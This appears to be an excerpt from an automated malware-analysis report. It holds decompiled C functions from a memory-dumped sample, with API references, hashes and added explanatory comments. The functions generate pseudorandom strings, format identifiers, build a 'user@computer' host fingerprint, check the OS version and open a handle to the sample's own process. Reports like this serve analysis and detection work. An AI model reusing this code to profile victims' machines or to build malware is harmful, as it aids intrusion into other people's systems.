                            0x00f172db
                            0x00f173dd
                            0x00f173e5
                            0x00000000
                            0x00f173e5
                            0x00f172e4
                            0x00f172eb
                            0x00f172f3
                            0x00f172f8
                            0x00f17301
                            0x00f1730c
                            0x00f17313
                            0x00f17316
                            0x00f17415
                            0x00f173c9
                            0x00f173c9
                            0x00f173ce
                            0x00f173d9
                            0x00f173db
                            0x00000000
                            0x00f173db
                            0x00f17320
                            0x00f17327
                            0x00f1732a
                            0x00f1732f
                            0x00f1733f
                            0x00f17342
                            0x00f17348
                            0x00f1734e
                            0x00f17354
                            0x00f17357
                            0x00f1735d
                            0x00f17360
                            0x00f17365
                            0x00f17369
                            0x00f17369
                            0x00f17375
                            0x00f17381
                            0x00f17385
                            0x00f17387
                            0x00f1738c
                            0x00f1738e
                            0x00f17393
                            0x00f17398
                            0x00f173a5
                            0x00f173ad
                            0x00f173b0
                            0x00f173b0
                            0x00f1738c
                            0x00000000
                            0x00f17377
                            0x00f1737b
                            0x00f173b2
                            0x00f173b5
                            0x00f173be
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00f173be
                            0x00f1737d
                            0x00000000
                            0x00f1737d
                            0x00f17375

                            APIs
                            • GetTickCount.KERNEL32 ref: 00F17146
                            • wsprintfA.USER32 ref: 00F17196
                            • wsprintfA.USER32 ref: 00F171B3
                            • wsprintfA.USER32 ref: 00F171DF
                            • HeapFree.KERNEL32(00000000,?), ref: 00F171F1
                            • wsprintfA.USER32 ref: 00F17212
                            • HeapFree.KERNEL32(00000000,?), ref: 00F17222
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F17250
                            • GetTickCount.KERNEL32 ref: 00F17261
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F17275
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F17293
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(00000000,?,00000000,00000000,?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A826
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A82E
                              • Part of subcall function 00F1A7FB: strcpy.NTDLL ref: 00F1A845
                              • Part of subcall function 00F1A7FB: lstrcat.KERNEL32(00000000,?), ref: 00F1A850
                              • Part of subcall function 00F1A7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F1A86D
                            • StrTrimA.SHLWAPI(00000000,00F1C2AC,?,057F95B0), ref: 00F172CA
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(057F9B58,00000000,00000000,?,00F16507,00000000), ref: 00F16F7D
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(?), ref: 00F16F85
                              • Part of subcall function 00F16F6D: lstrcpy.KERNEL32(00000000,057F9B58), ref: 00F16F99
                              • Part of subcall function 00F16F6D: lstrcat.KERNEL32(00000000,?), ref: 00F16FA4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00F172EB
                            • lstrcpy.KERNEL32(?,?), ref: 00F172F3
                            • lstrcat.KERNEL32(?,?), ref: 00F17301
                            • lstrcat.KERNEL32(?,00000000), ref: 00F17307
                              • Part of subcall function 00F165F6: lstrlen.KERNEL32(?,00000000,057F9B78,00000000,00F125B8,?,69B25F44,?,?,?,?,69B25F44,00000005,00F1D00C,?,?), ref: 00F165FD
                              • Part of subcall function 00F165F6: mbstowcs.NTDLL ref: 00F16626
                              • Part of subcall function 00F165F6: memset.NTDLL ref: 00F16638
                            • wcstombs.NTDLL ref: 00F17398
                              • Part of subcall function 00F142E6: SysAllocString.OLEAUT32(?), ref: 00F14327
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • HeapFree.KERNEL32(00000000,?,?), ref: 00F173D9
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F173E5
                            • HeapFree.KERNEL32(00000000,?,?,057F95B0), ref: 00F173F1
                            • HeapFree.KERNEL32(00000000,?), ref: 00F173FD
                            • HeapFree.KERNEL32(00000000,?), ref: 00F17409
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 3748877296-0
                            • Opcode ID: 6deadb74dab056ef075a08d5bdc437da6550e62397a2a6ce2b7a7e6b844c7991
                            • Instruction ID: 795c1b9e9693b48392c349f0d9bec823a25010bbd74ce5c9dc09361a7b7bf55f
                            • Opcode Fuzzy Hash: 6deadb74dab056ef075a08d5bdc437da6550e62397a2a6ce2b7a7e6b844c7991
                            • Instruction Fuzzy Hash: BA913871900218EFCB11EFA4DC84AEA7BB9FF48354F168055F818E7260DB35D991EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 55%
                            			E00F15D44(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				WCHAR* _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				void* __edi;
                            				void* __esi;
                            				WCHAR* _t58;
                            				signed int _t60;
                            				signed int _t62;
                            				intOrPtr _t64;
                            				intOrPtr _t66;
                            				intOrPtr _t70;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;
                            				WCHAR* _t80;
                            				WCHAR* _t83;
                            				void* _t84;
                            				void* _t85;
                            				void* _t86;
                            				intOrPtr _t92;
                            				signed int _t103;
                            				void* _t104;
                            				intOrPtr _t105;
                            				void* _t107;
                            				intOrPtr* _t115;
                            				void* _t119;
                            				WCHAR* _t125;
                            
                            				_t58 =  *0xf1d36c; // 0x57f9818
                            				_v24 = _t58;
                            				_v28 = 8;
                            				_v20 = GetTickCount();
                            				_t60 = E00F167ED();
                            				_t103 = 5;
                            				_t98 = _t60 % _t103 + 6;
                            				_t62 = E00F167ED();
                            				_t117 = _t62 % _t103 + 6;
                            				_v32 = _t62 % _t103 + 6;
                            				_t64 = E00F13C00(_t60 % _t103 + 6);
                            				_v16 = _t64;
                            				if(_t64 != 0) {
                            					_t66 = E00F13C00(_t117);
                            					_v12 = _t66;
                            					if(_t66 != 0) {
                            						_push(5);
                            						_t104 = 0xa;
                            						_t119 = E00F1A725(_t104,  &_v20);
                            						if(_t119 == 0) {
                            							_t119 = 0xf1c1ac;
                            						}
                            						_t70 = E00F14FFE(_v24);
                            						_v8 = _t70;
                            						if(_t70 != 0) {
                            							_t115 = __imp__;
                            							_t72 =  *_t115(_t119);
                            							_t75 =  *_t115(_v8);
                            							_t76 =  *_t115(_a4);
                            							_t80 = E00F155DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                            							_v24 = _t80;
                            							if(_t80 != 0) {
                            								_t105 =  *0xf1d2b8; // 0x48da5a8
                            								wsprintfW(_t80, _t105 + 0xf1eae8, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                            								_push(4);
                            								_t107 = 5;
                            								_t83 = E00F1A725(_t107,  &_v20);
                            								_a8 = _t83;
                            								if(_t83 == 0) {
                            									_a8 = 0xf1c1b0;
                            								}
                            								_t84 =  *_t115(_a8);
                            								_t85 =  *_t115(_v8);
                            								_t86 =  *_t115(_a4);
                            								_t125 = E00F155DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                            								if(_t125 == 0) {
                            									E00F16DFA(_v24);
                            								} else {
                            									_t92 =  *0xf1d2b8; // 0x48da5a8
                            									wsprintfW(_t125, _t92 + 0xf1ec60, _a8, _a8, _a4, _v8, _a12);
                            									 *_a16 = _v24;
                            									_v28 = _v28 & 0x00000000;
                            									 *_a20 = _t125;
                            								}
                            							}
                            							E00F16DFA(_v8);
                            						}
                            						E00F16DFA(_v12);
                            					}
                            					E00F16DFA(_v16);
                            				}
                            				return _v28;
                            			}
                            0x00f15d4a
                            0x00f15d52
                            0x00f15d55
                            0x00f15d62
                            0x00f15d65
                            0x00f15d6c
                            0x00f15d73
                            0x00f15d76
                            0x00f15d83
                            0x00f15d86
                            0x00f15d89
                            0x00f15d90
                            0x00f15d93
                            0x00f15d9b
                            0x00f15da2
                            0x00f15da5
                            0x00f15dab
                            0x00f15daf
                            0x00f15db8
                            0x00f15dbc
                            0x00f15dbe
                            0x00f15dbe
                            0x00f15dc6
                            0x00f15dcd
                            0x00f15dd0
                            0x00f15dd6
                            0x00f15ddd
                            0x00f15dee
                            0x00f15df5
                            0x00f15e07
                            0x00f15e0e
                            0x00f15e11
                            0x00f15e1a
                            0x00f15e42
                            0x00f15e47
                            0x00f15e4b
                            0x00f15e4f
                            0x00f15e56
                            0x00f15e59
                            0x00f15e5b
                            0x00f15e5b
                            0x00f15e65
                            0x00f15e6e
                            0x00f15e75
                            0x00f15e91
                            0x00f15e95
                            0x00f15ece
                            0x00f15e97
                            0x00f15e9a
                            0x00f15eb3
                            0x00f15ebb
                            0x00f15ec3
                            0x00f15ec7
                            0x00f15ec7
                            0x00f15e95
                            0x00f15ed6
                            0x00f15ed6
                            0x00f15ede
                            0x00f15ede
                            0x00f15ee6
                            0x00f15ee6
                            0x00f15ef2

                            APIs
                            • GetTickCount.KERNEL32 ref: 00F15D5C
                            • lstrlen.KERNEL32(00000000,00000005), ref: 00F15DDD
                            • lstrlen.KERNEL32(?), ref: 00F15DEE
                            • lstrlen.KERNEL32(00000000), ref: 00F15DF5
                            • lstrlenW.KERNEL32(80000002), ref: 00F15DFC
                            • wsprintfW.USER32 ref: 00F15E42
                            • lstrlen.KERNEL32(?,00000004), ref: 00F15E65
                            • lstrlen.KERNEL32(?), ref: 00F15E6E
                            • lstrlen.KERNEL32(?), ref: 00F15E75
                            • lstrlenW.KERNEL32(?), ref: 00F15E7C
                            • wsprintfW.USER32 ref: 00F15EB3
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                            • String ID:
                            • API String ID: 822878831-0
                            • Opcode ID: c12a590b09e287eb38710e2ee1d872516c2e310884795632b513ea56a3da2182
                            • Instruction ID: 23c793f59ec69dd802319da42224c2e2f50ca9b47a14373a72caea0e0989791c
                            • Opcode Fuzzy Hash: c12a590b09e287eb38710e2ee1d872516c2e310884795632b513ea56a3da2182
                            • Instruction Fuzzy Hash: EC518B32D00219EFCF11AFA4DC45ADE7BB6EF48314F158065F908A7261DB398A51EFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 63%
                            			E00F1A7FB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _t9;
                            				intOrPtr _t13;
                            				char* _t28;
                            				void* _t33;
                            				void* _t34;
                            				char* _t36;
                            				intOrPtr* _t40;
                            				char* _t41;
                            				char* _t42;
                            				char* _t43;
                            
                            				_t34 = __edx;
                            				_push(__ecx);
                            				_t9 =  *0xf1d2b8; // 0x48da5a8
                            				_t36 = 0;
                            				_t28 = E00F12262(__ecx, _t9 + 0xf1e62c);
                            				if(_t28 != 0) {
                            					_t40 = __imp__;
                            					_t13 =  *_t40(_t28);
                            					_v8 = _t13;
                            					_t6 =  *_t40(_a4) + 1; // 0x57f95b1
                            					_t41 = E00F155DC(_v8 + _t6);
                            					if(_t41 != 0) {
                            						strcpy(_t41, _t28);
                            						_pop(_t33);
                            						__imp__(_t41, _a4);
                            						_t36 = E00F166FF(_t34, _t41, _a8);
                            						E00F16DFA(_t41);
                            						_t42 = E00F14024(StrTrimA(_t36, "="), _t36);
                            						if(_t42 != 0) {
                            							E00F16DFA(_t36);
                            							_t36 = _t42;
                            						}
                            						_t43 = E00F1484D(_t36, _t33);
                            						if(_t43 != 0) {
                            							E00F16DFA(_t36);
                            							_t36 = _t43;
                            						}
                            					}
                            					E00F16DFA(_t28);
                            				}
                            				return _t36;
                            			}
                            0x00f1a7fb
                            0x00f1a7fe
                            0x00f1a7ff
                            0x00f1a80e
                            0x00f1a815
                            0x00f1a819
                            0x00f1a81f
                            0x00f1a826
                            0x00f1a82b
                            0x00f1a833
                            0x00f1a83d
                            0x00f1a841
                            0x00f1a845
                            0x00f1a84b
                            0x00f1a850
                            0x00f1a860
                            0x00f1a862
                            0x00f1a879
                            0x00f1a87d
                            0x00f1a880
                            0x00f1a885
                            0x00f1a885
                            0x00f1a88e
                            0x00f1a892
                            0x00f1a895
                            0x00f1a89a
                            0x00f1a89a
                            0x00f1a892
                            0x00f1a89d
                            0x00f1a89d
                            0x00f1a8a8

                            APIs
                              • Part of subcall function 00F12262: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,00F1A815,?,00000000,00000000,?,?,75145520,00F164DC), ref: 00F122C9
                              • Part of subcall function 00F12262: sprintf.NTDLL ref: 00F122EA
                            • lstrlen.KERNEL32(00000000,?,00000000,00000000,?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A826
                            • lstrlen.KERNEL32(?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A82E
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • strcpy.NTDLL ref: 00F1A845
                            • lstrcat.KERNEL32(00000000,?), ref: 00F1A850
                              • Part of subcall function 00F166FF: lstrlen.KERNEL32(?,?,00F164DC,00F164DC,00000001,00000000,00000000,?,00F1A85F,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F16716
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F1A86D
                              • Part of subcall function 00F14024: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00F1A879,00000000,?,75145520,00F164DC,?,057F95B0), ref: 00F1402E
                              • Part of subcall function 00F14024: _snprintf.NTDLL ref: 00F1408C
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: fd7e415f842538f457ae93d47e5f8bfc09eb0eacd1441bcb52c768d2b9480301
                            • Instruction ID: f73dd84f99435ca5113b6e6a826ee0f25e309b03df9b0bee467254d535c98695
                            • Opcode Fuzzy Hash: fd7e415f842538f457ae93d47e5f8bfc09eb0eacd1441bcb52c768d2b9480301
                            • Instruction Fuzzy Hash: 4B11C633A01229BB861277B89C45CEF3BAD9E897743094165F905D7101DE78DD8377E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 22%
                            			E00F1A90C(signed int __eax, signed int _a4, signed int _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				signed int _v20;
                            				intOrPtr _t81;
                            				char _t83;
                            				signed int _t90;
                            				signed int _t97;
                            				signed int _t99;
                            				char _t101;
                            				unsigned int _t102;
                            				intOrPtr _t103;
                            				char* _t107;
                            				signed int _t110;
                            				signed int _t113;
                            				signed int _t118;
                            				signed int _t122;
                            				intOrPtr _t124;
                            
                            				_t102 = _a8;
                            				_t118 = 0;
                            				_v20 = __eax;
                            				_t122 = (_t102 >> 2) + 1;
                            				_v8 = 0;
                            				_a8 = 0;
                            				_t81 = E00F155DC(_t122 << 2);
                            				_v16 = _t81;
                            				if(_t81 == 0) {
                            					_push(8);
                            					_pop(0);
                            					L37:
                            					return 0;
                            				}
                            				_t107 = _a4;
                            				_a4 = _t102;
                            				_t113 = 0;
                            				while(1) {
                            					_t83 =  *_t107;
                            					if(_t83 == 0) {
                            						break;
                            					}
                            					if(_t83 == 0xd || _t83 == 0xa) {
                            						if(_t118 != 0) {
                            							if(_t118 > _v8) {
                            								_v8 = _t118;
                            							}
                            							_a8 = _a8 + 1;
                            							_t118 = 0;
                            						}
                            						 *_t107 = 0;
                            						goto L16;
                            					} else {
                            						if(_t118 != 0) {
                            							L10:
                            							_t118 = _t118 + 1;
                            							L16:
                            							_t107 = _t107 + 1;
                            							_t15 =  &_a4;
                            							 *_t15 = _a4 - 1;
                            							if( *_t15 != 0) {
                            								continue;
                            							}
                            							break;
                            						}
                            						if(_t113 == _t122) {
                            							L21:
                            							if(_a8 <= 0x20) {
                            								_push(0xb);
                            								L34:
                            								_pop(0);
                            								L35:
                            								E00F16DFA(_v16);
                            								goto L37;
                            							}
                            							_t24 = _v8 + 5; // 0xcdd8d2f8
                            							_t103 = E00F155DC((_v8 + _t24) * _a8 + 4);
                            							if(_t103 == 0) {
                            								_push(8);
                            								goto L34;
                            							}
                            							_t90 = _a8;
                            							_a4 = _a4 & 0x00000000;
                            							_v8 = _v8 & 0x00000000;
                            							_t124 = _t103 + _t90 * 4;
                            							if(_t90 <= 0) {
                            								L31:
                            								 *0xf1d2b0 = _t103;
                            								goto L35;
                            							}
                            							do {
                            								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                            								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                            								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                            								_v12 = _v12 & 0x00000000;
                            								if(_a4 <= 0) {
                            									goto L30;
                            								} else {
                            									goto L26;
                            								}
                            								while(1) {
                            									L26:
                            									_t99 = _v12;
                            									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                            									if(_t99 == 0) {
                            										break;
                            									}
                            									_v12 = _v12 + 1;
                            									if(_v12 < _a4) {
                            										continue;
                            									}
                            									goto L30;
                            								}
                            								_v8 = _v8 - 1;
                            								L30:
                            								_t97 = _a4;
                            								_a4 = _a4 + 1;
                            								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                            								__imp__(_t124);
                            								_v8 = _v8 + 1;
                            								_t124 = _t124 + _t97 + 1;
                            							} while (_v8 < _a8);
                            							goto L31;
                            						}
                            						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                            						_t101 = _t83;
                            						if(_t83 - 0x61 <= 0x19) {
                            							_t101 = _t101 - 0x20;
                            						}
                            						 *_t107 = _t101;
                            						_t113 = _t113 + 1;
                            						goto L10;
                            					}
                            				}
                            				if(_t118 != 0) {
                            					if(_t118 > _v8) {
                            						_v8 = _t118;
                            					}
                            					_a8 = _a8 + 1;
                            				}
                            				goto L21;
                            			}

                            (Instruction addresses for the listing above, 0x00f1a913 to 0x00f1aa96, formed a side-by-side column on the original page and are not reproduced here.)

                            APIs
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00F1AA09
                            • lstrcat.KERNEL32(69B25F45,00000020), ref: 00F1AA1E
                            • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00F1AA35
                            • lstrlen.KERNEL32(69B25F45), ref: 00F1AA59
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                            • String ID:
                            • API String ID: 3214092121-3916222277
                            • Opcode ID: 5b244b0290d34e87c381dd8fd69f0d38b16aa25c9fa2e7b69f3211a818e8c0a9
                            • Instruction ID: 2be14c22b904270d376140b068e409a131162cf4c6a1a3025c3afffece12d6d7
                            • Opcode Fuzzy Hash: 5b244b0290d34e87c381dd8fd69f0d38b16aa25c9fa2e7b69f3211a818e8c0a9
                            • Instruction Fuzzy Hash: 1751C231E01108EFCF11CF99C9847EDBBB6FF45320F16809AE8559B211C774AA81EB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F18941() {
                            				long _v8;
                            				long _v12;
                            				int _v16;
                            				long _t39;
                            				long _t43;
                            				signed int _t47;
                            				signed int _t52;
                            				int _t56;
                            				int _t57;
                            				char* _t63;
                            				short* _t66;
                            
                            				_v16 = 0;
                            				_v8 = 0;
                            				GetUserNameW(0,  &_v8); // size query: with a NULL buffer _v8 receives the required length in WCHARs, terminator included
                            				_t39 = _v8;
                            				if(_t39 != 0) {
                            					_v12 = _t39;
                            					_v8 = 0;
                            					GetComputerNameW(0,  &_v8); // same size query for the NetBIOS computer name
                            					_t43 = _v8;
                            					if(_t43 != 0) {
                            						_t11 = _t43 + 2; // 0x75145522
                            						_v12 = _v12 + _t11;
                            						_t63 = E00F155DC(_v12 + _t11 << 2); // heap allocation (RtlAllocateHeap wrapper, see APIs); '+' binds tighter than '<<', so this is (_v12 + _t11) * 4: one block holds both the UTF-16 scratch copy and the UTF-8 result
                            						if(_t63 != 0) {
                            							_t47 = _v12;
                            							_t66 = _t63 + _t47 * 2; // UTF-16 scratch area in the upper part of the block
                            							_v8 = _t47;
                            							if(GetUserNameW(_t66,  &_v8) == 0) {
                            								L7:
                            								E00F16DFA(_t63); // error path: release the block (presumably the matching free)
                            							} else {
                            								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40; // overwrite the user name's terminating null with L'@'
                            								_t52 = _v8;
                            								_v12 = _v12 - _t52;
                            								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) { // the computer name is written directly after the '@'
                            									goto L7;
                            								} else {
                            									_t56 = _v12 + _v8;
                            									_t31 = _t56 + 2; // 0xf1642f
                            									_v12 = _t56;
                            									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0); // 0xfde9 = 65001 = CP_UTF8: "<user>@<computer>" is re-encoded as UTF-8 at the start of the block
                            									_v8 = _t57;
                            									if(_t57 == 0) {
                            										goto L7;
                            									} else {
                            										_t63[_t57] = 0; // NUL-terminate
                            										_v16 = _t63;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return _v16; // UTF-8 "<user>@<computer>" (caller-owned) or NULL on any failure
                            			}

                            (Instruction addresses for the listing above, 0x00f1894f to 0x00f18a12, formed a side-by-side column on the original page and are not reproduced here.)

                            APIs
                            • GetUserNameW.ADVAPI32(00000000,00F1642D), ref: 00F18955
                            • GetComputerNameW.KERNEL32(00000000,00F1642D), ref: 00F18971
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetUserNameW.ADVAPI32(00000000,00F1642D), ref: 00F189AB
                            • GetComputerNameW.KERNEL32(00F1642D,75145520), ref: 00F189CD
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00F1642D,00000000,00F1642F,00000000,00000000,?,75145520,00F1642D), ref: 00F189F0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                            • String ID:
                            • API String ID: 3850880919-0
                            • Opcode ID: b8c42a3d335ffda85f9bfe935615ec38bb599190075aa0a792c4232822c18775
                            • Instruction ID: 64c76135056add4dcaa86e5ff6aa5be5dd58d1b5a99fc2723a9de28d79ed881e
                            • Opcode Fuzzy Hash: b8c42a3d335ffda85f9bfe935615ec38bb599190075aa0a792c4232822c18775
                            • Instruction Fuzzy Hash: 1121C876D00249FFCB11DFA9C9858EEBBB8EF48344B5584AAE501E7200DB359F45EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F12CBF(intOrPtr _a4) {
                            				void* _t2;
                            				long _t4;
                            				void* _t5;
                            				long _t6;
                            				void* _t7;
                            				void* _t13;
                            
                            				_t2 = CreateEventA(0, 1, 0, 0); // manual-reset, initially non-signaled, unnamed event
                            				 *0xf1d2a4 = _t2; // kept in a global
                            				if(_t2 == 0) {
                            					return GetLastError();
                            				}
                            				_t4 = GetVersion(); // low byte = major version; the decompiler has lost the byte-width compare that follows, which is why the flow around L4/L5 reads oddly
                            				if(_t4 != 5) {
                            					L4:
                            					if(_t13 <= 0) {
                            						_t5 = 0x32; // 50 = ERROR_NOT_SUPPORTED: the version gate rejects the host
                            						return _t5;
                            					}
                            					L5:
                            					 *0xf1d294 = _t4; // cache the version DWORD
                            					_t6 = GetCurrentProcessId();
                            					 *0xf1d290 = _t6; // cache own PID
                            					 *0xf1d29c = _a4; // cache the caller's argument
                            					_t7 = OpenProcess(0x10047a, 0, _t6); // open a real handle to itself: PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION | SYNCHRONIZE
                            					 *0xf1d28c = _t7;
                            					if(_t7 == 0) {
                            						 *0xf1d28c =  *0xf1d28c | 0xffffffff; // fall back to (HANDLE)-1, the pseudo-handle GetCurrentProcess() returns
                            					}
                            					return 0;
                            				}
                            				if(_t4 > 0) {
                            					goto L5;
                            				}
                            				_t13 = _t4 - _t4;
                            				goto L4;
                            			}

                            (Instruction addresses for the listing above, 0x00f12cc7 to 0x00f12d29, formed a side-by-side column on the original page and are not reproduced here.)

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00F1233B,?), ref: 00F12CC7
                            • GetVersion.KERNEL32 ref: 00F12CD6
                            • GetCurrentProcessId.KERNEL32 ref: 00F12CED
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00F12D0A
                            • GetLastError.KERNEL32 ref: 00F12D29
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 49b15d54480f165129175e5d85f9fa90c26f6341015c0d6a62538993041e6be1
                            • Instruction ID: bac03dfc2e99968cde1e4b6367b09e8c29e553fabad353d429134e0fa5f9423a
                            • Opcode Fuzzy Hash: 49b15d54480f165129175e5d85f9fa90c26f6341015c0d6a62538993041e6be1
                            • Instruction Fuzzy Hash: 5CF04970A8034DDFE7A49FA4ED097E53BB1AB08761F12C519E626D71E4D3708491BF28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 00F14327
                            • SysFreeString.OLEAUT32(?), ref: 00F1440A
                              • Part of subcall function 00F152A1: SysAllocString.OLEAUT32(00F1C2B0), ref: 00F152F1
                            • SafeArrayDestroy.OLEAUT32(?), ref: 00F1445E
                            • SysFreeString.OLEAUT32(?), ref: 00F1446C
                              • Part of subcall function 00F12C14: Sleep.KERNEL32(000001F4), ref: 00F12C5C
                            Memory Dump Source
